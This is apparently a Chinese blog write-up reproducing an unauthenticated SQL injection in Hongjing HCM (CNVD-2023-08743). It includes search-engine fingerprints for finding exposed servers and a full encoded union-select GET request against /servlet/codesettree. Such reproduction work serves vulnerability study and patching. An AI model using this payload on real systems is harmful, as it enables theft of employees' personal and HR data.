CNVD-2023-08743:宏景HCM SQL注入漏洞复现 [附POC]

原创 已于 2023-11-07 16:43:32 修改 · 3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #安全 #web安全 #网络安全 #系统安全

于 2023-11-07 11:04:53 首次发布
本文详细描述了宏景HCM系统中发现的SQL注入漏洞,攻击者可执行任意SQL,影响版本低于8.2。提供复现方法和POC,强调了未经授权的访问风险,并建议用户及时更新官方补丁。

文章目录

宏景HCM SQL注入漏洞复现 (CNVD-2023-08743) [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。

宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 影响版本

宏景HCM<8.2

0x04 漏洞环境

FOFA语法:body=‘<div class=“hj-hy-all-one-logo”’

icon_hash=“947874108”

鹰图语法:app.name=“宏景 HCM”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)
(注入点是categories字段)

/servlet/codesettree?categories=[加密后的恶意sql]&codesetid=1&flag=c&parentid=-1&status=1

注:这里需要对hrms中的sql语句进行编码

工具地址:见资源
需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密

$ java -jar HrmsTool.jar
Usage:
    java -jar HrmsTool.jar -e xxx
    java -jar HrmsTool.jar -d xxx

在这里插入图片描述

构造payload(查询数据库版本)

GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

3.复现

执行payload(查询数据库版本)
在这里插入图片描述

0x06 修复建议

建议及时更新官方补丁:
http://hjsoft.com.cn/
宏景eHR SQL注入漏洞复现CNVD-2023-08743
0xSec
05-30 5438
宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景eHR sduty/getSdutyTree SQL注入漏洞复现
0xSec
07-04 1105
宏景eHR /servlet/sduty/getSdutyTree 接口处存在SQL注入漏洞,,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
漏洞复现宏景HCM-LoadOtherTreeServlet SQL注入
weixin_54799594的博客
07-11 1765
漏洞复现过程记录
漏洞复现-宏景HJSOFT系列
aming小老弟
03-15 1770
宏景HCM--------------------------------------------fofa:app=“HJSOFT-HCM
精选资源
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
漏洞复现宏景ehr-hcm-khfieldtree-sql注入
漏洞复现
01-09 714
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 khfieldtree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
CNVD-C-2023-76801:用友NC uapjs RCE漏洞复现[POC]
薛定谔嘚喵博客
11-08 1415
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs (jsinvoke)应用构造恶意请求非法上传后门程序此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
漏洞复现宏景HCM-SQL注入-downlawbase
漏洞复现
04-10 559
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 showmediainfo 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现宏景HCM人力资源信息管理系统——openFile-文件读取
LongL_GuYu的博客
06-29 1382
宏景HCM人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件,其`openFile接口`存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953)
最新发布
qq_43540348的博客
03-31 440
宏景人力资源管理系统是一款专业、高效的一体化HR管理平台,涵盖组织架构、招聘管理、员工档案、考勤薪资、绩效培训等核心模块,通过智能化流程与数据分析助力企业实现人力资源数字化转型升级。系统支持云端/本地部署,提供灵活配置与移动端应用,有效提升管理效率、降低人力成本,满足中大型企业复杂管理需求,同时确保数据安全与合规性。
复现宏景HCM 任意文件读取漏洞_63
fushuang333的博客
03-03 1607
复现宏景HCM 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
宏景HCM uploadLogo.do接口存在任意文件上传漏洞
一个努力学习网安的小牛马
11-21 1390
宏景HCM是一款基于先进的人力资本管理体系和灵活开放的技术架构的企业管理系统,提供了强大的业务模型定义、权限管理、工作流平台、预警平台等个性化配置工具。该uoloadLogo.do接口处存在任意文件上传漏洞。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。访问`http://ip/1.jsp。先进行cookie的获取。
漏洞复现CNVD-2023-08743
zkaqlaoniao的博客
10-30 393
title=”人力资源信息管理系统”
漏洞复现宏景HCM人力资源信息管理系统——LoadOtherTreeServlet——SQL注入
LongL_GuYu的博客
07-13 1307
宏景HCM人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件,旨在帮助企事业单位构建高绩效组织,推动组织健康成长,提升组织软实力。其`LoadOtherTreeServlet`接口处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
宏景eHR showmediainfo SQL注入漏洞复现
0xSec
04-04 586
宏景eHR showmediainfo接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息
宏景eHR 任意文件上传漏洞
holyxp的博客
07-25 1693
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。宏景eHR OfficeServer.jsp接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。
漏洞复现宏景人力资源信息管理系统 showmediainfo SQL注入漏洞
https://blog.echo234.cn/
04-04 1836
宏景科技是一家在智慧城市综合服务领域具有显著影响力的企业。公司以数字赋能百业兴旺,以智慧定义城市未来,致力于让城市管理更简单,让市民工作、生活更便捷。作为行业的佼佼者,宏景科技不断跟进物联网、大数据、云计算、GIS、人工智能等新技术的最新发展及应用,积极掌握并实现核心技术的更新迭代,积累了一定的技术储备。
cnvd-2023-08743
08-20
cnvd-2023-08743是一个漏洞编号,对应的是一个存在于某个软件或系统中的安全漏洞。根据这个漏洞编号,我们可以查找相关的漏洞详情和修复建议。 漏洞编号通常由国家信息安全漏洞库(CNVD)分配,用于标识和跟踪安全漏洞。通过查找相关的漏洞报告,我们可以了解到这个漏洞的具体情况和影响范围。 对于cnvd-2023-08743这个具体漏洞,因为没有给出具体的信息,所以我们无法提供对其的详细回答。要了解更多关于这个漏洞的情况,可以在CNVD官方网站或其他漏洞报告平台上查询。在查找到相关的漏洞报告后,可以了解到这个漏洞的类型、危害程度和可能的攻击方式。 修复漏洞的方法通常包括修补软件或系统的安全漏洞、升级到最新的补丁版本、关闭漏洞影响的功能,在出现漏洞之前进行安全配置等。需要注意的是,修复漏洞时应当及时行动,并确保修复措施不会影响系统的正常运行。 最后,漏洞网络安全的一个常见问题,及时了解和修复漏洞对保护我们的信息安全至关重要。我们应该保持对漏洞信息的关注,并采取必要的措施来保护自己的数据安全
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值